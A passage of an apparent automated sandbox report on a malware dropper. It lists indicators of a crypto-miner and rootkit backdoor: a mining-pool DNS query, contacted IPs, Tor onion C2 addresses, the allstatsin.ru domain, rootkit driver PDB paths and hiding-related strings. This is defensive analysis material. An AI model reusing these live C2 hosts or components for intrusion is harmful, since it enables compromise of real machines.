                          Source: Yara matchFile source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPED
                          Source: unknownDNS query: name: xmr-eu1.nanopool.org

                          Compliance

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeUnpacked PE file: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeUnpacked PE file: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: C:\Program Files\Google\Chrome\updater.exeDirectory created: C:\Program Files\Google\Libs
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: Loader.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: EfiGuardDxe.pdb7 source: e0cbefcb1af40c7d4aff4aca26621a98.exe
                          Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: symsrv.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe
                          Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Unable to locate the .pdb file in this location source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: The module signature does not match with .pdb signature. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: .pdb.dbg source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: '(EfiGuardDxe.pdbx source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: symsrv.pdbGCTL source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.00000000040D8000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000C7A000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000037E9000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: or you do not have access permission to the .pdb location. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: EfiGuardDxe.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: dbghelp.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: dbghelp.pdbGCTL source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405C63
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_00402910 FindFirstFileW,2_2_00402910
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_004068B4 FindFirstFileW,FindClose,2_2_004068B4
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429C40 CharUpperW,CharToOemBuffA,CharToOemBuffA,AddConsoleAliasW,GetAltTabInfoA,DrawCaption,WinHttpGetProxyForUrl,SetThreadContext,GetFileAttributesExA,DragAcceptFiles,CoGetInstanceFromFile,__putw,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,FindNextVolumeMountPointA,GlobalAlloc,GetWindowsDirectoryW,SetThreadIdealProcessor,GetWindowsDirectoryW,SetThreadIdealProcessor,ReadConsoleOutputCharacterW,FatalAppExitW,BuildCommDCBAndTimeoutsA,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,SetConsoleCP,FindAtomW,GetTempPathA,CompareStringA,GetCurrentDirectoryW,lstrlenW,GetLocaleInfoW,GetCommConfig,CancelIo,_hread,CreateHardLinkA,ConvertFiberToThread,DeleteVolumeMountPointA,EnumSystemCodePagesA,GetEnvironmentStringsW,InterlockedIncrement,InterlockedDecrement,GetProcessVersion,SetLocaleInfoA,_hread,_hread,_hread,ReadConsoleInputW,GetPrivateProfileIntW,GetConsoleAliasExesA,OpenJobObjectA,SetTapeParameters,CreateNamedPipeW,BuildCommDCBAndTimeoutsW,VerSetConditionMask,GetCurrencyFormatW,lstrcpyA,ExitProcess,WriteConsoleInputW,GetFileAttributesA,GetStringTypeW,GetPrivateProfileStringA,OpenSemaphoreA,WriteConsoleOutputW,WriteConsoleInputW,AddConsoleAliasW,HeapCreate,DeleteFileA,WriteConsoleInputW,GetFileAttributesA,WaitNamedPipeW,GetCalendarInfoW,CreateDirectoryExW,GetModuleHandleA,SetThreadLocale,_hread,GetCurrentProcess,MoveFileWithProgressA,HeapFree,EnumSystemCodePagesA,FoldStringA,SetFileShortNameW,InterlockedPushEntrySList,QueryDosDeviceA,BuildCommDCBAndTimeoutsW,QueryPerformanceFrequency,FindNextFileW,SetCommState,VerifyVersionInfoW,FindNextVolumeMountPointW,SetCalendarInfoA,GetShortPathNameW,GetVolumePathNameW,GetVolumeNameForVolumeMountPointA,GetConsoleAliasesLengthA,TlsFree,GetDriveTypeW,SetComputerNameA,Process32FirstW,GetFileAttributesA,GetStringTypeW,GetStringTypeW,GetDriveTypeA,GetSystemWindowsDirectoryA,InterlockedPopEntrySList,EnumSystemLocalesW,GetCommState,IsWow64Process,GetSystemDirectoryA,GetTempPathW,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleMode,VirtualProtect,InterlockedIncrement,GetCharWidthFloatA,InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,3_2_00429C40
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429870 WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,3_2_00429870
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429A5C WriteConsoleInputW,WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,3_2_00429A5C
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429A30 DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,WriteConsoleInputW,WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,3_2_00429A30
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429AB9 WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,3_2_00429AB9
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_0042A378 InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,3_2_0042A378
                          Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push rbx60_2_00007FF6EB43DB93

                          Networking

                          barindex
                          Source: C:\Windows\explorer.exeNetwork Connect: 95.214.26.28 80
                          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.34.170 443
                          Source: C:\Windows\explorer.exeNetwork Connect: 51.15.58.224 14433
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: !This program cannoHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttps://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionSELECT displayName FROM AntiVirusProductW. Europe Standard Time
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C11A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no 